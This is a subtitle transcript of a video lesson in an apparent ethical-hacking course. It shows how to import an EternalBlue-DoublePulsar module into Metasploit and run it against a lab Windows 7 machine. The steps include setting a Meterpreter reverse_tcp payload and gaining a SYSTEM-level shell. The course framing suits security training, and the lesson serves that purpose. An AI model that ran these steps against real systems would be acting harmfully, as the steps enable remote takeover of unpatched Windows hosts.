1
00:00:00,000 --> 00:00:01,770
Instructor: Welcome back.

2
00:00:01,770 --> 00:00:05,430
Time to check out a variant of EternalBlue Exploit.

3
00:00:05,430 --> 00:00:07,530
I prefer to always use this one

4
00:00:07,530 --> 00:00:09,480
due to two different reasons.

5
00:00:09,480 --> 00:00:10,860
It showed to work more

6
00:00:10,860 --> 00:00:13,500
than the default Metasploit Framework exploit

7
00:00:13,500 --> 00:00:16,950
and it also has a little better options aimed

8
00:00:16,950 --> 00:00:21,060
at both 32-bit and 64-bit Windows Systems.

9
00:00:21,060 --> 00:00:25,740
Nonetheless, we can read more about DoublePulsar right here.

10
00:00:25,740 --> 00:00:27,720
This is the official RAPID7 website

11
00:00:27,720 --> 00:00:29,310
and here we can check out

12
00:00:29,310 --> 00:00:32,880
what exactly is a DoublePulsar when it is used

13
00:00:32,880 --> 00:00:35,130
and when did it come out.

14
00:00:35,130 --> 00:00:38,100
So here it says DoublePulsar is an implant leaked

15
00:00:38,100 --> 00:00:40,830
by the ShadowBrokers group earlier this year

16
00:00:40,830 --> 00:00:44,610
that enables the execution of additional malicious code.

17
00:00:44,610 --> 00:00:46,530
So you can read right here

18
00:00:46,530 --> 00:00:48,900
but you can also check out different websites

19
00:00:48,900 --> 00:00:52,140
in order to find out how exactly does the exploit work

20
00:00:52,140 --> 00:00:53,820
in case you're interested in that.

21
00:00:53,820 --> 00:00:57,000
But what's important for us in this video is how

22
00:00:57,000 --> 00:00:58,650
to run the exploit.

23
00:00:58,650 --> 00:01:02,220
Remember, we have no module in Metasploit Framework

24
00:01:02,220 --> 00:01:04,890
for the EternalBlue-DoublePulsar.

25
00:01:04,890 --> 00:01:07,620
So we must download the Exploit ourselves

26
00:01:07,620 --> 00:01:10,470
and import it in Metasploit Framework.

27
00:01:10,470 --> 00:01:12,150
This will be a little bit of a longer video.

28
00:01:12,150 --> 00:01:14,640
Since there are few things that we need to do

29
00:01:14,640 --> 00:01:16,680
to achieve this exploit.

30
00:01:16,680 --> 00:01:20,820
The first thing that we must do is install wine.

31
00:01:20,820 --> 00:01:22,710
And what is wine?

32
00:01:22,710 --> 00:01:25,230
Well, wine is a program that allows us

33
00:01:25,230 --> 00:01:29,220
to execute Windows applications on Linux systems.

34
00:01:29,220 --> 00:01:30,840
Why do we need this?

35
00:01:30,840 --> 00:01:34,560
Well, it is required for DoublePulsar to run.

36
00:01:34,560 --> 00:01:37,530
To insulate, we can run the following command,

37
00:01:37,530 --> 00:01:42,530
sudo dpkg dash dash add dash architecture

38
00:01:46,800 --> 00:01:50,820
i386, and then these two signs,

39
00:01:50,820 --> 00:01:53,640
which mean that we are going to add another command

40
00:01:53,640 --> 00:01:58,590
to this larger command and that is apt-get update.

41
00:01:58,590 --> 00:02:03,590
And another command is apt-get install wine32.

42
00:02:05,310 --> 00:02:07,530
So these are three separate commands

43
00:02:07,530 --> 00:02:11,670
and in the last one, we are going to install the wine32.

44
00:02:11,670 --> 00:02:14,640
If you press Enter and type in the password,

45
00:02:14,640 --> 00:02:17,280
this command should start executing.

46
00:02:17,280 --> 00:02:19,650
Now if it tells you right here this,

47
00:02:19,650 --> 00:02:21,210
which is permission denied

48
00:02:21,210 --> 00:02:23,670
then just copy this command

49
00:02:23,670 --> 00:02:26,880
without the sudo, enter the root terminal

50
00:02:26,880 --> 00:02:31,230
by typing sudo su and then paste the command,

51
00:02:31,230 --> 00:02:32,880
press Enter

52
00:02:32,880 --> 00:02:35,250
and now it should start executing all

53
00:02:35,250 --> 00:02:36,720
of these three commands.

54
00:02:36,720 --> 00:02:38,370
Now I will Control C this

55
00:02:38,370 --> 00:02:41,460
because I have already performed this for you.

56
00:02:41,460 --> 00:02:42,750
Just wait for this to finish

57
00:02:42,750 --> 00:02:45,330
and then proceed with the tutorial.

58
00:02:45,330 --> 00:02:47,250
And the reason why we are doing all of this is

59
00:02:47,250 --> 00:02:50,700
because we need to get wine directory

60
00:02:50,700 --> 00:02:52,800
with the drive_c folder.

61
00:02:52,800 --> 00:02:54,720
And you might be asking well,

62
00:02:54,720 --> 00:02:57,420
what is that and where do I even find it?

63
00:02:57,420 --> 00:03:00,930
Well, sometimes it won't appear after installation.

64
00:03:00,930 --> 00:03:05,310
So what we must do is install some Windows Program.

65
00:03:05,310 --> 00:03:07,170
In this case, let's just go

66
00:03:07,170 --> 00:03:11,850
and install Python 2 for Windows on our Kali Linux machine,

67
00:03:11,850 --> 00:03:15,750
not because we need it, but because after we install it,

68
00:03:15,750 --> 00:03:18,210
our drive_c folder will appear.

69
00:03:18,210 --> 00:03:20,760
And if you have no idea what I'm talking about,

70
00:03:20,760 --> 00:03:22,140
hang on for just a second

71
00:03:22,140 --> 00:03:25,140
and you will see it at the Installer Windows program.

72
00:03:25,140 --> 00:03:28,620
It is all required for our exploit to run.

73
00:03:28,620 --> 00:03:32,400
So navigate to this link right here

74
00:03:32,400 --> 00:03:37,400
which is https://www.python.org/downloads/release

75
00:03:38,610 --> 00:03:43,610
and then slash python-2714 and slash at the end.

76
00:03:44,100 --> 00:03:46,650
Here we should see this version of Python

77
00:03:46,650 --> 00:03:48,240
and what we are interested in

78
00:03:48,240 --> 00:03:53,240
from all of these versions is Windows x86 MSI Installer.

79
00:03:53,850 --> 00:03:57,480
Click on it and click on Save File.

80
00:03:57,480 --> 00:04:00,570
It'll start downloading our Windows MSI Installer

81
00:04:00,570 --> 00:04:02,160
and once it has finished,

82
00:04:02,160 --> 00:04:04,830
we want to go to the Downloads directory

83
00:04:04,830 --> 00:04:07,560
and open Terminal inside of it.

84
00:04:07,560 --> 00:04:08,910
Once it does that,

85
00:04:08,910 --> 00:04:12,257
we can run the command wine msiexecute slash i

86
00:04:14,880 --> 00:04:18,300
and then the name of the file, which in my case

87
00:04:18,300 --> 00:04:23,300
and in your case will be Python 2.7.14.msi.

88
00:04:23,940 --> 00:04:25,620
Just a small interrupt.

89
00:04:25,620 --> 00:04:28,080
This command that I just showed you,

90
00:04:28,080 --> 00:04:31,530
make sure to execute it using Root Terminal.

91
00:04:31,530 --> 00:04:35,280
So don't execute it using our regular MrHacker terminal.

92
00:04:35,280 --> 00:04:38,820
Otherwise in most cases it might not actually work.

93
00:04:38,820 --> 00:04:42,660
So what you can do is you can just type sudo su,

94
00:04:42,660 --> 00:04:44,790
enter the password for your account

95
00:04:44,790 --> 00:04:48,790
and run the wine msiexecute slash i

96
00:04:49,710 --> 00:04:53,310
and then the name of the file using root terminal.

97
00:04:53,310 --> 00:04:55,293
Okay, let's go back to the video.

98
00:04:56,550 --> 00:05:01,343
Click Enter and this will start installing Python 2.7.14

99
00:05:02,790 --> 00:05:04,560
as a Windows Program.

100
00:05:04,560 --> 00:05:07,620
We want to click on Next on every step.

101
00:05:07,620 --> 00:05:09,420
So Next, Next, Next, Next.

102
00:05:09,420 --> 00:05:12,670
So this already exists, I will click on Yes

103
00:05:13,650 --> 00:05:17,073
and this installation should finish in just a few seconds.

104
00:05:18,600 --> 00:05:20,760
Once it is done, you can click on Finish.

105
00:05:20,760 --> 00:05:24,330
And right now we should have our wine folder

106
00:05:24,330 --> 00:05:26,610
in the slash root directory.

107
00:05:26,610 --> 00:05:28,650
See if I go to the slash root directory

108
00:05:28,650 --> 00:05:31,593
I need to go cd slash root.

109
00:05:34,740 --> 00:05:36,720
Let us just enter the root terminal

110
00:05:36,720 --> 00:05:40,170
and go to the slash root directory.

111
00:05:40,170 --> 00:05:44,460
If we type ls, it'll be empty.

112
00:05:44,460 --> 00:05:46,020
Did we fail somewhere?

113
00:05:46,020 --> 00:05:47,430
Well, not exactly.

114
00:05:47,430 --> 00:05:50,610
Once installed, wine will be a hidden directory

115
00:05:50,610 --> 00:05:53,610
which means its name will start with a dot.

116
00:05:53,610 --> 00:05:55,920
And by the way, to list all the files

117
00:05:55,920 --> 00:05:58,620
inside of a directory including hidden files,

118
00:05:58,620 --> 00:06:02,283
we can run the command ls -la.

119
00:06:03,390 --> 00:06:05,760
And here are all the hidden files

120
00:06:05,760 --> 00:06:09,180
including our .wine directory.

121
00:06:09,180 --> 00:06:10,830
Now if you cannot see it,

122
00:06:10,830 --> 00:06:14,250
make sure that you run this command

123
00:06:14,250 --> 00:06:19,230
which is wine msiexecute /i python 2.7.14

124
00:06:19,230 --> 00:06:21,930
from the root terminal.

125
00:06:21,930 --> 00:06:23,910
And just click on Next, Next, Next steps.

126
00:06:23,910 --> 00:06:26,790
And you should have this .wine folder inside

127
00:06:26,790 --> 00:06:29,370
of the slash root directory.

128
00:06:29,370 --> 00:06:34,110
Great, so if I go to that folder, cd.wine,

129
00:06:34,110 --> 00:06:36,780
here I will have drive_c folder

130
00:06:36,780 --> 00:06:39,600
and some other folders as well.

131
00:06:39,600 --> 00:06:42,120
So everything works for now.

132
00:06:42,120 --> 00:06:44,010
Now that we got this ready,

133
00:06:44,010 --> 00:06:46,920
we can proceed to download our exploit.

134
00:06:46,920 --> 00:06:49,410
So go once again to the Firefox,

135
00:06:49,410 --> 00:06:53,760
open a second tab and type EternalBlue-DoublePulsar

136
00:06:53,760 --> 00:06:56,820
and it'll show up this first link, which is a GitHub link.

137
00:06:56,820 --> 00:06:58,230
We want to click on it.

138
00:06:58,230 --> 00:07:01,800
And since we already know how to install our GitHub tool,

139
00:07:01,800 --> 00:07:03,210
let's just do it real quick.

140
00:07:03,210 --> 00:07:05,310
We just want to copy this link right here,

141
00:07:06,840 --> 00:07:08,730
go inside our terminal.

142
00:07:08,730 --> 00:07:10,420
Let's change the directory

143
00:07:12,540 --> 00:07:17,540
to the slash home slash mrhacker slash Desktop directory.

144
00:07:17,730 --> 00:07:18,600
And once again,

145
00:07:18,600 --> 00:07:20,940
I'll advise you to run all of these commands

146
00:07:20,940 --> 00:07:22,920
using root terminal otherwise,

147
00:07:22,920 --> 00:07:26,043
it might not work and type git clone,

148
00:07:27,390 --> 00:07:28,950
paste the command

149
00:07:28,950 --> 00:07:32,340
and it should download the EternalBlue DoublePulsar tool

150
00:07:32,340 --> 00:07:33,600
for us.

151
00:07:33,600 --> 00:07:35,790
Now we are not done yet.

152
00:07:35,790 --> 00:07:38,220
We must do some modification

153
00:07:38,220 --> 00:07:40,560
in order for this tool to be able to open

154
00:07:40,560 --> 00:07:42,300
in the Metasploit framework.

155
00:07:42,300 --> 00:07:46,530
If we type ls and change to the Eternalblue-Doublepulsar,

156
00:07:46,530 --> 00:07:49,800
right here, we should have two interesting files.

157
00:07:49,800 --> 00:07:53,250
One of them is the ruby file, which is the Exploit itself

158
00:07:53,250 --> 00:07:56,760
and the other one is this deps directory.

159
00:07:56,760 --> 00:07:58,380
Now this is a directory once again,

160
00:07:58,380 --> 00:08:01,050
it is not the file and you cannot really see that

161
00:08:01,050 --> 00:08:02,070
from the root terminal

162
00:08:02,070 --> 00:08:05,700
because different file types are not different colors

163
00:08:05,700 --> 00:08:07,713
and that is the only problematic thing.

164
00:08:08,550 --> 00:08:10,970
But nonetheless, what we must do

165
00:08:10,970 --> 00:08:14,490
is we must copy these two files.

166
00:08:14,490 --> 00:08:16,690
So let's go with copy deps first

167
00:08:18,030 --> 00:08:23,030
to the user/share/metasploit-framework

168
00:08:23,564 --> 00:08:28,564
/modules/exploits/windows and then smb.

169
00:08:28,830 --> 00:08:32,280
And here we can copy the deps directory

170
00:08:32,280 --> 00:08:33,539
and to copy a directory,

171
00:08:33,539 --> 00:08:36,480
you just need to add -r at the end.

172
00:08:36,480 --> 00:08:39,450
So once again, copying deps directory

173
00:08:39,450 --> 00:08:43,260
to the slash user slash share slash metasploit-framework

174
00:08:43,260 --> 00:08:46,440
slash modules slash exploits slash Windows

175
00:08:46,440 --> 00:08:48,390
and then slash smb.

176
00:08:48,390 --> 00:08:52,290
Click Enter and it should copy the deps directory there.

177
00:08:52,290 --> 00:08:53,940
We want to do the same thing

178
00:08:53,940 --> 00:08:56,340
with the Eternalblue ruby file.

179
00:08:56,340 --> 00:08:58,263
So copy to the same directory.

180
00:09:01,890 --> 00:09:04,740
Modules/exploits/windows/smb

181
00:09:04,740 --> 00:09:07,560
and here we want to copy it, just for this file.

182
00:09:07,560 --> 00:09:09,060
You don't need to add the dash r

183
00:09:09,060 --> 00:09:12,180
since it is a file and not a directory.

184
00:09:12,180 --> 00:09:13,440
Okay, great.

185
00:09:13,440 --> 00:09:15,330
There is one more location that we want

186
00:09:15,330 --> 00:09:16,950
to copy both of these files.

187
00:09:16,950 --> 00:09:19,950
So I will just type once again the same command

188
00:09:19,950 --> 00:09:23,010
just this time, I will switch the location

189
00:09:23,010 --> 00:09:25,500
to the slash root directory.

190
00:09:25,500 --> 00:09:29,160
So I will copy the deps in the slash root add -r

191
00:09:29,160 --> 00:09:31,920
at the end and double copy the EternalBlue

192
00:09:31,920 --> 00:09:34,053
to the slash root directory as well.

193
00:09:35,370 --> 00:09:38,100
Great, now we should be ready to go.

194
00:09:38,100 --> 00:09:40,203
Let us open our msfconsole.

195
00:09:41,550 --> 00:09:42,780
While this is opening,

196
00:09:42,780 --> 00:09:45,840
make sure that your Windows 7 machine is up and running.

197
00:09:45,840 --> 00:09:48,690
And let us straight away check out the IP address

198
00:09:48,690 --> 00:09:51,866
of this Windows 7 machine by typing ipconfig,

199
00:09:51,866 --> 00:09:55,080
192.168.1.8 for me.

200
00:09:55,080 --> 00:09:56,160
And what we want to do

201
00:09:56,160 --> 00:09:58,980
once the Metasploit Framework opens up is we want

202
00:09:58,980 --> 00:10:02,610
to navigate to our Eternalblue-Doublepulsar exploit.

203
00:10:02,610 --> 00:10:05,910
And remember, we put it inside of the Windows exploit

204
00:10:05,910 --> 00:10:07,710
and SMB exploit.

205
00:10:07,710 --> 00:10:11,898
So what we can do is we can type use exploit/ windows/

206
00:10:11,898 --> 00:10:14,310
smb type the name of the Exploit

207
00:10:14,310 --> 00:10:16,980
which is eternalblue_doublepulsar.

208
00:10:16,980 --> 00:10:20,463
So just type eternalblue underscore doublepulsar.

209
00:10:21,540 --> 00:10:23,280
click Enter.

210
00:10:23,280 --> 00:10:26,040
And now we got our Exploit imported

211
00:10:26,040 --> 00:10:27,540
in Metasploit Framework.

212
00:10:27,540 --> 00:10:30,390
This is an Exploit that we didn't have before.

213
00:10:30,390 --> 00:10:32,610
Let us show information for it.

214
00:10:32,610 --> 00:10:34,170
As it says in the description,

215
00:10:34,170 --> 00:10:37,410
this module exploits a vulnerability on SMB version one

216
00:10:37,410 --> 00:10:40,980
and version two protocols through Eternalblue.

217
00:10:40,980 --> 00:10:43,140
After that, Doublepulsar is used

218
00:10:43,140 --> 00:10:46,560
to inject remotely a malicious dll.

219
00:10:46,560 --> 00:10:51,120
Great, let's also show options to see what options we got

220
00:10:51,120 --> 00:10:54,030
and up here, we got quite a few of them.

221
00:10:54,030 --> 00:10:56,643
And keep in mind that all of them are required.

222
00:10:57,600 --> 00:10:59,550
Now here it tells us that we need

223
00:10:59,550 --> 00:11:03,450
to specify the path to the deps directory.

224
00:11:03,450 --> 00:11:05,520
So it seems that I made a mistake before

225
00:11:05,520 --> 00:11:08,160
I copied it directly to the root directory

226
00:11:08,160 --> 00:11:10,320
and we had to copy the entire file.

227
00:11:10,320 --> 00:11:12,120
So what I'm going to do is

228
00:11:12,120 --> 00:11:13,920
I'm going to open a second terminal,

229
00:11:14,790 --> 00:11:16,863
enter the roots terminal,

230
00:11:18,600 --> 00:11:21,990
go to the Desktop of our Mrhacker account

231
00:11:21,990 --> 00:11:25,560
and copy this entire Eternalblue-Doublepulsar-Metasploit

232
00:11:25,560 --> 00:11:27,450
to the root directory.

233
00:11:27,450 --> 00:11:31,440
So copy Eternalblue to this slash root.

234
00:11:31,440 --> 00:11:35,130
Make sure to add dash r because we are coping a directory

235
00:11:35,130 --> 00:11:38,160
and right now this path should be good

236
00:11:38,160 --> 00:11:39,960
and we should not really change it.

237
00:11:39,960 --> 00:11:41,520
We can just leave it right here.

238
00:11:41,520 --> 00:11:43,410
Since deps directory is inside

239
00:11:43,410 --> 00:11:45,900
of the Eternalblue-Doublepulsar directory

240
00:11:45,900 --> 00:11:48,390
and we just copy it to the root directory.

241
00:11:48,390 --> 00:11:50,250
So these two are good.

242
00:11:50,250 --> 00:11:53,430
Under the PROCESSINJECT, it tells us right here name

243
00:11:53,430 --> 00:11:54,990
of the process to inject to

244
00:11:54,990 --> 00:11:58,350
and we must change to this process name right here,

245
00:11:58,350 --> 00:12:00,510
for 64-bit machines.

246
00:12:00,510 --> 00:12:03,450
Since my Windows 7 machine is a 64-bit,

247
00:12:03,450 --> 00:12:06,600
I will type this name right here

248
00:12:06,600 --> 00:12:08,340
and I will change the process to inject

249
00:12:08,340 --> 00:12:11,160
since it is not set right here by default.

250
00:12:11,160 --> 00:12:13,387
So type set PROCESSINJECT

251
00:12:14,520 --> 00:12:18,900
and paste the name of the process and press Enter.

252
00:12:18,900 --> 00:12:21,480
If your Windows 7 machine is a 32-bit one,

253
00:12:21,480 --> 00:12:26,370
you can leave this wlms.exe process to inject.

254
00:12:26,370 --> 00:12:29,040
The RHOSTS we already know to be the IP address.

255
00:12:29,040 --> 00:12:30,513
So 192.168.1.8.

256
00:12:31,834 --> 00:12:34,470
The RPORT, we are going to leave to 445.

257
00:12:34,470 --> 00:12:36,120
The target architecture,

258
00:12:36,120 --> 00:12:38,190
if your Windows machine is a 32-bit,

259
00:12:38,190 --> 00:12:40,500
you can leave it to x86.

260
00:12:40,500 --> 00:12:42,480
Mine is 64-bit,

261
00:12:42,480 --> 00:12:46,963
so I will set the target architecture to x64

262
00:12:49,230 --> 00:12:52,260
The WINEPATH, and this is why we needed the wine for.

263
00:12:52,260 --> 00:12:54,450
We need to set the WINEPATH in order

264
00:12:54,450 --> 00:12:55,800
for all of this to work.

265
00:12:55,800 --> 00:12:57,990
And right here it is set correctly.

266
00:12:57,990 --> 00:13:01,710
Remember, our .wine folder is inside of the root directory

267
00:13:01,710 --> 00:13:05,910
and the drive_c folder is inside of the .wine directory.

268
00:13:05,910 --> 00:13:08,370
So this is something that we will not change.

269
00:13:08,370 --> 00:13:09,990
Another configuration that we want

270
00:13:09,990 --> 00:13:13,230
to do is this Payload options right here.

271
00:13:13,230 --> 00:13:17,190
It is currently set to windows/meterpreter/reverse_tcp.

272
00:13:17,190 --> 00:13:19,890
And remember in one of the last few videos,

273
00:13:19,890 --> 00:13:23,970
I told you that this is a payload for 32-bit Windows.

274
00:13:23,970 --> 00:13:26,670
If your Windows is 32-bit, once again,

275
00:13:26,670 --> 00:13:28,020
you don't need to change this.

276
00:13:28,020 --> 00:13:29,910
But if it is a 64-bit Windows,

277
00:13:29,910 --> 00:13:34,910
I want to type set payload windows/x64 slash meterpreter

278
00:13:38,220 --> 00:13:40,473
slash reverse tcp.

279
00:13:41,850 --> 00:13:46,140
Show options once again, everything seems to be good.

280
00:13:46,140 --> 00:13:48,960
Now you can also show targets if you want to

281
00:13:48,960 --> 00:13:51,450
just to see what are all the possible targets

282
00:13:51,450 --> 00:13:54,180
that you can attack with this exploit.

283
00:13:54,180 --> 00:13:56,220
And once you check all of them out,

284
00:13:56,220 --> 00:13:57,903
you can just type run.

285
00:13:59,040 --> 00:14:02,760
This will launch our Eternalblue-Doublepulsar exploit

286
00:14:02,760 --> 00:14:04,650
on the target machine.

287
00:14:04,650 --> 00:14:07,293
It might take a few seconds for it to work.

288
00:14:09,570 --> 00:14:11,863
And here it is.

289
00:14:11,863 --> 00:14:15,540
Our Meterpreter session is once again open,

290
00:14:15,540 --> 00:14:17,160
exploit works successfully

291
00:14:17,160 --> 00:14:22,160
and we can once again run the commands on the target system.

292
00:14:22,260 --> 00:14:25,290
We can enter a shell and get its command prompt.

293
00:14:25,290 --> 00:14:26,643
If I type, whoami,

294
00:14:27,630 --> 00:14:30,330
it says that we are the system level account.

295
00:14:30,330 --> 00:14:33,570
So we are the highest privilege account once again.

296
00:14:33,570 --> 00:14:36,510
Great, now I know that you are impatiently waiting

297
00:14:36,510 --> 00:14:38,460
for us to cover this meterpreter shell

298
00:14:38,460 --> 00:14:39,990
and all of its commands as well

299
00:14:39,990 --> 00:14:42,870
as the post exploitation modules that we can run with it.

300
00:14:42,870 --> 00:14:45,720
But hang on for just a little bit more,

301
00:14:45,720 --> 00:14:47,910
we got two more exploits to cover

302
00:14:47,910 --> 00:14:49,290
and then we can proceed

303
00:14:49,290 --> 00:14:51,000
to creating (indistinct) malicious files

304
00:14:51,000 --> 00:14:55,050
and using them as well as running post-exploitation modules.

305
00:14:55,050 --> 00:14:56,190
In the next video,

306
00:14:56,190 --> 00:14:59,610
we're going to cover an exploit called BlueKeep

307
00:14:59,610 --> 00:15:02,340
which was discovered in 2019.

308
00:15:02,340 --> 00:15:03,183
See you there.